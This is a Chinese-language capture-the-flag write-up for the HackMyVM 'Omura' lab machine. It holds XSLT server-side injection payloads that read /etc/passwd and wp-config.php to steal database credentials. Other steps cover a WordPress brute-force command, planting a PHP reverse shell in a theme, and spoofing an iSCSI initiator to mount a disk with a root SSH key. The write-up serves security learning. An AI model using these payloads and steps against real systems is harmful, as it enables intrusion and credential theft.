打靶记录(八五)之HMVOmura

所渗透的靶机IP为192.168.56.105

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.105
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-05 09:33 UTC
Nmap scan report for 192.168.56.105 (192.168.56.105)
Host is up (0.00012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3260/tcp open  iscsi
MAC Address: 08:00:27:FA:75:8C (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.30 seconds

sudo nmap -sT -sV -sC -O -p22,80,3260 192.168.56.105                                             
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-05 09:33 UTC
Nmap scan report for 192.168.56.105 (192.168.56.105)
Host is up (0.00037s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 db:f9:46:e5:20:81:6c:ee:c7:25:08:ab:22:51:36:6c (RSA)
|   256 33:c0:95:64:29:47:23:dd:86:4e:e6:b8:07:33:67:ad (ECDSA)
|_  256 be:aa:6d:42:43:dd:7d:d4:0e:0d:74:78:c1:89:a1:36 (ED25519)
80/tcp   open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: XSLT Transformation
|_http-server-header: Apache/2.4.54 (Debian)
3260/tcp open  iscsi   Synology DSM iSCSI
| iscsi-info: 
|   iqn.2023-02.omura.hmv:target01: 
|     Address: 192.168.56.105:3260,1
|     Authentication: required
|_    Auth reason: Authorization failure
MAC Address: 08:00:27:FA:75:8C (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.90 seconds

开设了一个Web服务和iscsi服务

Web(Getshell)

主页写可以将XML文件转换为其他格式，暂时不知道怎么用啊。在扫描中发现omura.hmv，添加hosts并扫描子域名，竟然有一个wordpress的子域名，添加

访问之后，似乎可以爆破密码，存在一个叫做“admin”的用户名

wpscan --url=http://wordpress.omura.hmv/ -P /usr/share/wordlists/rockyou.txt -U admin

但是爆破不出来啊，也没有插件漏洞之类的，没思路了（悲

看看WP所引用的这篇文章

https://book.hacktricks.xyz/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations

只要能在服务器上存储xsl文件并且访问就可以利用这个漏洞

在 http://omura.hmv/ 界面我们就可以上传xsl文件，并且使用的是Saxonica框架。可以读取任意文件

先创建一个xml.xml(内容好像无所谓)

<?xml version="1.0" encoding="UTF-8"?>
<catalog>
    <cd>
        <title>CD Title</title>
        <artist>The artist</artist>
        <company>Da Company</company>
        <price>10000</price>
        <year>1760</year>
    </cd>
</catalog>

然后创建一个read.xsl，用于读取/etc/passwd并输出到生成的XML文档中

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>

上传两者之后点击执行，我们成功读取到了内容！

现在读取/var/www/wordpress目录下的内容

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/var/www/wordpress', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>

得到的内容是

index.phplicense.txtreadme.htmlwordpresswp-activate.phpwp-adminwp-blog-header.phpwp-comments-post.phpwp-config.phpwp-contentwp-cron.phpwp-includeswp-links-opml.phpwp-load.phpwp-login.phpwp-mail.phpwp-settings.phpwp-signup.phpwp-trackback.phpxmlrpc.php

读取wp-config.pgp

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/var/www/wordpress/wp-config.php', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>

得到敏感信息：

*/ define( 'DB_NAME', 'wordpressdb' ); /** Database username */ define( 'DB_USER', 'admin' ); /** Database password */ define( 'DB_PASSWORD', 'dw42k25MiXT' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /

得到凭证:admin/dw42k25MiXT

登录wordpress

尝试更改index.php为一个php反弹shell

但是更新的时候报错：

Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

尝试在右上角将主题改成twenty-two

开启监听，然后访问:

http://wordpress.omura.hmv/wp-content/themes/twentytwo/index.php

提权

转移shell至msf

还有一个叫做ford的用户

试着用之前的凭证连接数据库，但是似乎没有什么用。

也许要用到之前的3260端口了

根据这篇

https://book.hacktricks.xyz/network-services-pentesting/3260-pentesting-iscsi

先安装open-iscsi

sudo apt-get install open-iscsi

在靶机上找到文件：

/sys/kernel/config/target/iscsi/iqn.2023-02.omura.hmv:target01/tpgt_1/acls/iqn.2023-02.omura.hmv:node01.initiator01/fabric_statistics/iscsi_sess_stats

说明发起的目标是iqn.2023-02.omura.hmv:node01.initiator01

编辑kali上的/etc/iscsi/initiatorname.iscsi,添加上:

InitiatorName=iqn.2023-02.omura.hmv:node01.initiator01

更改/etc/iscsi/initiatorname.iscsi ，取消掉注释

# Startup settings

#*****************

# To request that the iscsi service scripts startup a session, use "automatic":

node.startup = automatic

重启服务

sudo systemctl restart iscsid open-iscsi

确认目标

sudo iscsiadm -m discovery -t sendtargets -p 192.168.56.105

连接：

sudo iscsiadm -m node --login

sudo fdisk -l

发现新增了一块/dev/sdb分区，挂在到一个目录

mkdir /tmp/omura
sudo mount /dev/sdb /tmp/omura

得到一个ssh私钥，可以用于连接root！

碎碎念

通过xsx和xml读取文件还是很有趣的233但是iscsi服务就有点冷门了吧，感觉是不会再遇到的233